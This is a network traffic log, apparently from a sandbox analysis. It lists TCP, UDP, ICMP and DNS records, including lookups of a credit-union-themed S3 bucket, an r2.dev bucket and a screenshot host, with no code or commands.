Jan 2, 2025 17:21:53.504638910 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.504646063 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504674911 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504684925 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.504694939 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504733086 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.504740000 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504753113 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504801035 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.511779070 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.511785984 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.773658037 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:53.773710012 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:53.773773909 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:53.773986101 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:53.773998022 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:53.949657917 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:53.950037003 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:53.950061083 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:53.951133966 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:53.951214075 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:53.951644897 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:53.951711893 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:53.951816082 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:53.951822996 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:53.995059013 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.023694992 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:54.023739100 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:54.023828030 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:54.024051905 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:54.024070978 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:54.192966938 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193008900 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193043947 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193063974 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.193073988 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193115950 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193149090 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.193664074 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193694115 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193726063 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.193728924 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193739891 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.193778992 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.197598934 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.197627068 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.197676897 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.197698116 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.197755098 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.279623985 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.279699087 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.279726028 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.279752970 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.279753923 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.279791117 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.279819965 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.280226946 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.280253887 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.280284882 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.280293941 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.280308962 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.280347109 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.280399084 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.280447960 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.280721903 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:54.280750990 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:54.289377928 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.289661884 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.289681911 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.290674925 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.290730953 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.291605949 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.291670084 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.291764975 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.291770935 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.338344097 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.437762022 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.437798023 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.437804937 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.437882900 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.437896013 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.465461969 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.465523005 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.465565920 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.465619087 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.466070890 CET	49761	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:54.466085911 CET	443	49761	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:54.696670055 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:54.697026968 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:54.697050095 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:54.698549986 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:54.698625088 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:54.699804068 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:54.699901104 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:54.700066090 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:54.700073004 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:54.745130062 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:55.118537903 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:55.118721962 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:55.118779898 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:55.119616985 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:55.119632006 CET	443	49762	13.32.27.129	192.168.2.4
Jan 2, 2025 17:21:55.119641066 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:55.119687080 CET	49762	443	192.168.2.4	13.32.27.129
Jan 2, 2025 17:21:59.608659029 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:59.608750105 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:59.608803034 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:22:00.230827093 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:22:00.230845928 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:22:25.704140902 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:22:25.704169035 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:22:33.887526035 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:33.887572050 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:33.887641907 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:33.887945890 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:33.887959003 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:34.522434950 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:34.522761106 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:34.522779942 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:34.523072958 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:34.523380041 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:34.523435116 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:34.565129995 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:39.213414907 CET	49723	80	192.168.2.4	199.232.214.172
Jan 2, 2025 17:22:39.213479042 CET	49724	80	192.168.2.4	199.232.214.172
Jan 2, 2025 17:22:39.218511105 CET	80	49723	199.232.214.172	192.168.2.4
Jan 2, 2025 17:22:39.218560934 CET	49723	80	192.168.2.4	199.232.214.172
Jan 2, 2025 17:22:39.218827009 CET	80	49724	199.232.214.172	192.168.2.4
Jan 2, 2025 17:22:39.218873024 CET	49724	80	192.168.2.4	199.232.214.172
Jan 2, 2025 17:22:42.231107950 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:22:42.231200933 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:22:42.231270075 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:22:44.573841095 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:44.573893070 CET	443	49797	142.250.185.196	192.168.2.4
Jan 2, 2025 17:22:44.573972940 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:46.231529951 CET	49797	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:22:46.231550932 CET	443	49797	142.250.185.196	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 17:21:30.084131002 CET	53	61462	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:30.093619108 CET	53	56990	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:31.236906052 CET	53	53016	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:33.824471951 CET	49356	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:33.824599981 CET	61547	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:33.831176043 CET	53	49356	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:33.831254959 CET	53	61547	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:35.802294016 CET	58267	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:35.802881956 CET	64982	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:35.821892023 CET	53	64982	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:35.833997011 CET	53	58267	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:36.703435898 CET	61010	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:36.703643084 CET	63479	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:36.726841927 CET	53	63479	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:36.733474016 CET	53	61010	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:38.550441027 CET	56405	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:38.550776958 CET	57974	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:38.560746908 CET	61424	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:38.561152935 CET	54073	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:38.578097105 CET	53	61424	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:38.583102942 CET	53	54073	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:38.768573999 CET	53	57974	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:38.833729029 CET	53	56405	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:39.780891895 CET	50928	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:39.781030893 CET	62053	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:40.017040014 CET	53	62053	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:40.033080101 CET	53	50928	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:48.316339016 CET	53	53177	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:50.784207106 CET	138	138	192.168.2.4	192.168.2.255
Jan 2, 2025 17:21:51.057770014 CET	54897	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:51.057950020 CET	62178	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:51.067343950 CET	53	62178	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:51.067362070 CET	53	54897	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:52.279117107 CET	60961	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:52.279266119 CET	51243	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:52.289809942 CET	53	51243	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:52.299601078 CET	53592	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:52.299746990 CET	65462	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:52.303806067 CET	53	60961	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:52.306767941 CET	53	65462	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:52.308789015 CET	53	53592	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:52.337922096 CET	53	61294	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:52.394414902 CET	62093	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:52.394597054 CET	55162	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:52.403410912 CET	53	62093	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:52.405678988 CET	53	55162	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:53.467065096 CET	60095	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:53.467215061 CET	51362	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:53.475506067 CET	53	60095	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:53.498254061 CET	53	51362	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:53.509382010 CET	61477	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:53.509623051 CET	57347	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:53.741061926 CET	53	57347	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:53.773082018 CET	53	61477	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:54.015662909 CET	49635	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:54.015818119 CET	63157	53	192.168.2.4	1.1.1.1
Jan 2, 2025 17:21:54.022937059 CET	53	49635	1.1.1.1	192.168.2.4
Jan 2, 2025 17:21:54.023272038 CET	53	63157	1.1.1.1	192.168.2.4
Jan 2, 2025 17:22:07.244044065 CET	53	52972	1.1.1.1	192.168.2.4
Jan 2, 2025 17:22:29.521315098 CET	53	59410	1.1.1.1	192.168.2.4
Jan 2, 2025 17:22:29.737497091 CET	53	64931	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 2, 2025 17:21:53.498306990 CET	192.168.2.4	1.1.1.1	c20d	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 17:21:33.824471951 CET	192.168.2.4	1.1.1.1	0x4652	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:33.824599981 CET	192.168.2.4	1.1.1.1	0x6b58	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:35.802294016 CET	192.168.2.4	1.1.1.1	0x361f	Standard query (0)	midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.802881956 CET	192.168.2.4	1.1.1.1	0x729c	Standard query (0)	midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:36.703435898 CET	192.168.2.4	1.1.1.1	0x3641	Standard query (0)	assets.orb.alkamitech.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:36.703643084 CET	192.168.2.4	1.1.1.1	0x1dab	Standard query (0)	assets.orb.alkamitech.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:38.550441027 CET	192.168.2.4	1.1.1.1	0x491e	Standard query (0)	www.midoregon.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:38.550776958 CET	192.168.2.4	1.1.1.1	0x98d5	Standard query (0)	www.midoregon.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:38.560746908 CET	192.168.2.4	1.1.1.1	0x7131	Standard query (0)	assets.orb.alkamitech.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:38.561152935 CET	192.168.2.4	1.1.1.1	0x1635	Standard query (0)	assets.orb.alkamitech.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:39.780891895 CET	192.168.2.4	1.1.1.1	0x5ef2	Standard query (0)	www.midoregon.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:39.781030893 CET	192.168.2.4	1.1.1.1	0x1acc	Standard query (0)	www.midoregon.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:51.057770014 CET	192.168.2.4	1.1.1.1	0x43d1	Standard query (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:51.057950020 CET	192.168.2.4	1.1.1.1	0x31e	Standard query (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev	65	IN (0x0001)	false
Jan 2, 2025 17:21:52.279117107 CET	192.168.2.4	1.1.1.1	0x124f	Standard query (0)	assets.orb.alkamitech.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.279266119 CET	192.168.2.4	1.1.1.1	0xeb25	Standard query (0)	assets.orb.alkamitech.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:52.299601078 CET	192.168.2.4	1.1.1.1	0x91f8	Standard query (0)	img001.prntscr.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.299746990 CET	192.168.2.4	1.1.1.1	0x84e7	Standard query (0)	img001.prntscr.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:52.394414902 CET	192.168.2.4	1.1.1.1	0xeeb8	Standard query (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.394597054 CET	192.168.2.4	1.1.1.1	0xa7a1	Standard query (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev	65	IN (0x0001)	false
Jan 2, 2025 17:21:53.467065096 CET	192.168.2.4	1.1.1.1	0x7421	Standard query (0)	img001.prntscr.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:53.467215061 CET	192.168.2.4	1.1.1.1	0x6de8	Standard query (0)	img001.prntscr.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:53.509382010 CET	192.168.2.4	1.1.1.1	0x4a5f	Standard query (0)	www.midoregon.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:53.509623051 CET	192.168.2.4	1.1.1.1	0xea5e	Standard query (0)	www.midoregon.com	65	IN (0x0001)	false
Jan 2, 2025 17:21:54.015662909 CET	192.168.2.4	1.1.1.1	0x7286	Standard query (0)	logo.clearbit.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:54.015818119 CET	192.168.2.4	1.1.1.1	0x651d	Standard query (0)	logo.clearbit.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 17:21:33.831176043 CET	1.1.1.1	192.168.2.4	0x4652	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:33.831254959 CET	1.1.1.1	192.168.2.4	0x6b58	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 2, 2025 17:21:35.821892023 CET	1.1.1.1	192.168.2.4	0x729c	No error (0)	midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com	s3-r-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com	s3-r-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		54.231.130.18	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		16.15.177.153	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		16.182.65.2	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		52.217.114.82	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		52.217.225.122	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		16.15.185.113	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		16.15.177.23	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:35.833997011 CET	1.1.1.1	192.168.2.4	0x361f	No error (0)	s3-r-w.us-east-1.amazonaws.com		16.15.177.113	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:36.726841927 CET	1.1.1.1	192.168.2.4	0x1dab	No error (0)	assets.orb.alkamitech.com	d2yc0o7ycjs17k.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:36.733474016 CET	1.1.1.1	192.168.2.4	0x3641	No error (0)	assets.orb.alkamitech.com	d2yc0o7ycjs17k.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:36.733474016 CET	1.1.1.1	192.168.2.4	0x3641	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.95	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:36.733474016 CET	1.1.1.1	192.168.2.4	0x3641	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.72	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:36.733474016 CET	1.1.1.1	192.168.2.4	0x3641	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.112	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:36.733474016 CET	1.1.1.1	192.168.2.4	0x3641	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.71	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:38.578097105 CET	1.1.1.1	192.168.2.4	0x7131	No error (0)	assets.orb.alkamitech.com	d2yc0o7ycjs17k.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:38.578097105 CET	1.1.1.1	192.168.2.4	0x7131	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.112	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:38.578097105 CET	1.1.1.1	192.168.2.4	0x7131	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.72	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:38.578097105 CET	1.1.1.1	192.168.2.4	0x7131	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.71	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:38.578097105 CET	1.1.1.1	192.168.2.4	0x7131	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.95	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:38.583102942 CET	1.1.1.1	192.168.2.4	0x1635	No error (0)	assets.orb.alkamitech.com	d2yc0o7ycjs17k.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:38.833729029 CET	1.1.1.1	192.168.2.4	0x491e	No error (0)	www.midoregon.com		67.227.180.41	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:40.033080101 CET	1.1.1.1	192.168.2.4	0x5ef2	No error (0)	www.midoregon.com		67.227.180.41	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:51.067362070 CET	1.1.1.1	192.168.2.4	0x43d1	No error (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev		172.66.0.235	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:51.067362070 CET	1.1.1.1	192.168.2.4	0x43d1	No error (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev		162.159.140.237	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.289809942 CET	1.1.1.1	192.168.2.4	0xeb25	No error (0)	assets.orb.alkamitech.com	d2yc0o7ycjs17k.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:52.303806067 CET	1.1.1.1	192.168.2.4	0x124f	No error (0)	assets.orb.alkamitech.com	d2yc0o7ycjs17k.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 17:21:52.303806067 CET	1.1.1.1	192.168.2.4	0x124f	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.112	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.303806067 CET	1.1.1.1	192.168.2.4	0x124f	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.71	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.303806067 CET	1.1.1.1	192.168.2.4	0x124f	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.72	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.303806067 CET	1.1.1.1	192.168.2.4	0x124f	No error (0)	d2yc0o7ycjs17k.cloudfront.net		143.204.215.95	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.306767941 CET	1.1.1.1	192.168.2.4	0x84e7	No error (0)	img001.prntscr.com			65	IN (0x0001)	false
Jan 2, 2025 17:21:52.308789015 CET	1.1.1.1	192.168.2.4	0x91f8	No error (0)	img001.prntscr.com		104.23.139.12	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.308789015 CET	1.1.1.1	192.168.2.4	0x91f8	No error (0)	img001.prntscr.com		104.23.140.12	A (IP address)	IN (0x0001)	false
Jan 2, 2025 17:21:52.403410912 CET	1.1.1.1	192.168.2.4	0xeeb8	No error (0)	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev		162.159.140.237	A (IP address)	IN (0x0001)	false
